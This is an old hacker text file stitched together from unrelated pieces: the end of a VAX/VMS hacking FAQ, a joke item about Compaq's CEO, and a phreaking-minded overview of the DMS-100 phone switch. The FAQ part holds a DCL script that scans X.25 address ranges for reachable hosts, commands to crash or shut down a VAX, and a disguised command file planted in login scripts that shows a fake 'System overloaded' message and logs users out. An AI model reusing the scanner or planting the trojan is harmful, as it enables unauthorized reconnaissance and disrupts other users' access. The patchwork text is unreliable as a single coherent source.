$ OPEN/READ VALUES SCAN.VAL $ READ VALUES PRE $ READ VALUES DTE $ READ VALUES END $ CLOSE VALUES $ LOG = "SCAN.LIS" $ TMP = "SCAN.TMP" $ OPEN/WRITE FILE 'LOG $ WRITE FILE "PREFIX:",PRE $ WRITE FILE "START :",DTE $ WRITE FILE "LAST :",END $LOOP: $ ON ERROR THEN GOTO OPEN $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE' $ WAIT 00:00:06 $ SPAWNNAME = F$GETJPI("","USERNAME") $ SPAWNNAME = F$EXTRACT(0,F$LOC(" ",SPAWNNAME),SPAWNNAME) + "" $ CONTEXT = "" $FINDPROC: $ PID = F$PID(CONTEXT) $ IF PID .EQS. "" THEN GOTO OPEN $ IF F$LOC(SPAWNNAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID $ GOTO FINDPROC $OPEN: $ ON ERROR THEN GOTO OPEN $ OPEN/READ PAD 'TMP $ MSSG = " Process stopped" $ ON ERROR THEN GOTO CLOSE $ READ PAD LINE $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE) $CLOSE: $ CLOSE PAD $ DELETE 'TMP';* $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN $ WRITE FILE PRE,DTE,MSSG $NOCONN: $ DTE = DTE + 1 $ IF DTE .LE. END THEN GOTO LOOP $ CLOSE FILE

( I don't have a clue by whom the code was written. )

then

$ create scan.val prefix startingNUA endingNUA <CTRL-Z> $ submit /noprint scan.com . . . $ search scan.lis "call connected"

[10]

" How do I crash a VAX !? "

$ set default sys$system $ @shutdown

or

$ set default sys$system $ run opccrash

[11]

" I have a dostogiefski.cld file; what do I do with it ? "

$ set command dostogiefski.cld

[12]

" Can I send messages to interactive processes ? "

$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "

[13]

" How can I prevent someone from phoning me all the time ? "

$ set broadcast=(nophone)

[14]

" Can I postpone/disable interactive logins ? "

$ set logins /interactive=0

$ set logins /interactive

will display current value.

Under the same `logic' :

$ create innocentfilename.com $ set nocontrol $ context = "" $ pid = F$PID(context) $ username = F$GETJPI(pid,"username") $ wait 00:01:00.00 $ write sys$output "" $ write sys$output " System overloaded; please try again later " $ write sys$output " Logging out process ''pid', of user ''user_name' " $ write sys$output "" $ logout /full

Add either to sys$system:sylogin.com or sys$login:login.com the following: " $ @innocent_filename.com ".

[15]

" How can I modify the welcome file ? Where is it held ? "

$ set default sys$system $ edit welcome.txt

[16]

" I am editing a huge text file. How can I reach the end of it ? "

at the editor's prompt type:

*find end

or

*find "search string"

[17]

" How can I be sure than noone is watching me from a hidden process ? "

$ show system /process VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25 Pid Process Name State Pri I/O CPU Page flts Ph.Mem . . . 00000114 SYMBIONT4 HIB 5 290 0 00:00:19.05 1650 47 00000117 SMTPSYMBIONT HIB 4 33398 0 00:16:49.67 246104 426 00000118 SYMBIONT6 HIB 4 47868 0 00:05:09.01 296 121 00001255 SYMBIONT0001 CUR 13 15 64293 0 00:05:08.12 1982 248

$ show system /full

VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43 Pid Process Name State Pri I/O CPU Page flts Ph.Mem . . . 00000114 SYMBIONT4 HIB 5 290 0 00:00:19.05 1650 47 [1,4] 00000117 SMTPSYMBIONT LEF 5 33407 0 00:16:49.78 246116 502 [1,4] 00000118 SYMBIONT6 HIB 5 47872 0 00:05:09.03 296 121 [1,4] 00001255 SYMBIONT0001 CUR 13 15 64348 0 00:05:09.60 2063 268 [1,4] $

See the difference between system's SYMBIONT processes ( i.e. SYMBIONT4, SYMBIONT6, SMTPSYMBIONT ) and the one created by using a `stealth' program ( SYMBIONT0001 ); the names and the User Identification Codes may vary, but state, priority, physical memory used, page faults, input/output and Process IDentification numbers, can reveal, in combination, such a nastyness.

Afterwards you may " show process /id=xxxx /continuous ", or " stop /id=xxxx ".

[18]

" Can I view the CPU usage of each process ? "

$ monitor processes /topcpu

will display a bar-chart of this kind.

[19]

Run the following .COM file and it will display information you'd possibly need on an account and/or node. It uses simple lexical functions.

$ output :== write sys$output $ output "" $ nodeid = F$CSID(context) $ nodename = F$GETSYI("nodename",,nodeid) $ if F$GETSYI("cluster_member") .EQS. "TRUE" $ then output " ''nodename' is a member of a cluster. " $ else output " ''nodename' is not a member of a cluster. " $ context = "" $ username = F$GETJPI("","username") $ output " Username : ''username' " $ group = F$GETJPI("","grp") $ output " Group : ''group' " $ uic = F$USER() $ output " User Identification Code : ''uic' " $ pid = F$PID(context) $ output " Process IDentification : ''pid' " $ process = F$PROCESS() $ output " Process Name : ''process' " $ terminal = F$GETJPI("","terminal") $ output " Terminal Name : ''terminal' " $ priority = F$GETJPI("","authpri") $ output " Authorized Priority : ''priority' " $ maxjobs = F$GETJPI("","maxjobs") $ output " Maximum Number of Processes Allowed : ''maxjobs' " $ authpriv = F$GETJPI("","authpriv") $ output " Authorized Privileges : ''authpriv' " $ curpriv = F$GETJPI("","curpriv") $ output " Current Privileges : ''curpriv' " $ directory = F$DIRECTORY() $ output " Directory : ''directory' " $ protection = F$ENVIRONMENT("protection") $ output " Protection : ''protection' " $ boottime = F$GETSYI("boottime") $ output " Boot Time : ''boottime' " $ time = F$TIME() $ output " Current Time : ''time' " $ version = F$GETSYI("version") $ output " VMS version : ''version' " $ output ""

You may :

$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb

and then transfer lexicals.hlp.

[20]

" How can I view/modify my disk quota limit ? "

DiskQuota was a standalone utility in versions prior to five; It is now a subset of the System Management utility, and thus you should :

$ set def sys$system $ run sysman SYSMAN> diskquota show /device=dua1: [1,1] %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: -- Node UIC Usage Permanent Quota Overdraft Limit [1,1] 123456 1500000 100

SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000

[END]

Post Scriptum

Some operations require privileges.

Compaq CEO blunders on TV

      Compaq CEO Eckard Pfeiffer last week visited The Netherlands
      to do some pr work. During a television interview for NOVA,
      a well known news show that aired last Friday, Pfeiffer
      claimed that pc's were easy to use, and could be used by
      virtually anyone. So, the reporter asked him to switch the
      tv channel on a Presario that was next to Pfeiffer that ran
      a Windows-based TV tuner. The result was Pfeifer frantically
      clicking on several menu bars, but instead of switching
      channels, he exited the program altogether. To make things
      worse, the reporter next asked him to start up a word
      processor.  Again, Pfeiffer, clicked his way around the
      desktop, but couldn't find nor start the program. Finally,
      he was asked to start up a game. You saw Pfeifer (now in
      deep trouble) clicking on all the tabs of the "easy to use"
      tab-works interface that is included on all Presario's,
      looking for games, while muttering "Were are ze games? I
      can't find ze games on zis machine!!!", his accent becoming
      increasingly more German then before. It was almost like Dr.
      Strangelove. The last shot is of a Compaq tech support guy,
      rushing in to help him out....  So much for ease of use....

Voorburgwal 129, 1012 EP Amsterdam, The Netherlands).

Ok, I'm going to assume that you already know a little bit about what it is you're reading. The DMS100/IBN (integrated business network) is composed of mainly electronic business sets, phones, data units, and attendant consoles and units, all physically at the customers place of business. While the digital switching software and support hardware is located at the Telco. Together, in tandem they work to give the customer one of the best combinations of features and benefits. The DMS-100 combines voice AND data in one business comunications package. One of the many advantages is it offers the use with any sized business with up to 30,000 lines. The IBN system controls most operations, diagnoses problems, and also has the ability to do limited repairs on itself. Being modular, it can meet the needs at hand, and have the ability for new features, as time goes by, while still maintaining a cost-effective environment. Another advantage is that is uses a central attendant where and when needed. Along with Call Routing, or CDR, to control and restrict Long Distnace Calling, and network management. The IBN gives the user hassle free operation. Northern Telcom's DMS-100 switches, which by the way are digital, are frequently backed-up by their higher trained personnel, which isnt saying much. Some other features are: Automatic Routing Selection, or ARS, which routes the long distance calls, if they are even allowed, over the most economical (right) route available. Station Message Detail Recording, or SMDR, which basically does just what its name states, records long distance charges, including but not limited to, originating number, time and length of call, authorization code, and others... Yet another capability is the Direct Inward System Access (DISA), which gives the personnel the ability to use the system to place long distance calls cheaply, even from outside the company (sounds like a PBX a bit doesn't it?). System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys, each with its associated source AND destination lamp to signify the status of both the calling and the called party status. The Second feature is Alpha Numeric Display Multiple Directory Number Feature Keys, up to 42 of them, which can be used for a Paging System, or speed dialing, and things along those lines. A third feature is the release Source/Release Destination Console, which features access to paging. Other features which mainly are unimportant I will list here, they are: Call Identifier Exclude Source/Exclude Destination. Remote Console Call Destination. Signal Source.Signal Destination. Call Holding. Call Detail Entry. Remote Console Call Selection. Console Display. Camp-on Automatic Recall Conference. A 6 port 2 way splitting non-delayed operation. Busy Verification of Lines. Manual and Automatic Hold. Multiple Console OPeration. Busy verification of trunks. Switched Loop Operation. Trunk Group Busy Indication. Uniform Call distribution form queue. Multiple listed directory numbers. Control of trunk group access. Secrecy. Night Service. Serial call. Speed Calling. Lockout. Delayed Operation. Position Busy. Interposition Calling. THrough Call Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed Call. Call Transfer/Conference. On-Hook Dialing. Additional Programmable Features include automatic hold. Listem-on hold. Multiple Appearance Directory Numbers, or MADN. Single Call Arrangement. Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume Control. Call Waiting. Stored Number Redial. Private Business Line. And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be used as a "standalone" or can be attached to the business set or other phone type unit. It has the ability to transmit over a two wire loop, at speeds of up to 56 kb per second, using a proprietary time compression multiplexing technology. The DMS100 is also available in different models to suit existing terminal capacities. It also provides integrated voice/data, that right data, communications. They, the phone company, and data unit, can operate together, simultaniously, or even independant of one another. Being fully digitized, it was one if the first switches to eliminate the use of those dinosaur analog modems (for which i still have a few if anyone wants to buy em off me or give me shipping money and ill send em to ya free). Well thats it for now. This should give you a good understanding of the capabilities of one of the many switches in use today. In fact, although outdated somewhat, my telco, citizens utilities, and one in stockton from what i just found out, is still using this switch (poor me in elk grove, ca eh?) which makes phreaking quite an easy task, not that it was really ever hard but anything to make it easier help. ANyway, if you have any comments/flames/general bullshit, mail it to either jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a last resort email address. ciao ---Captain Hook

------------------------------------------------------------------------------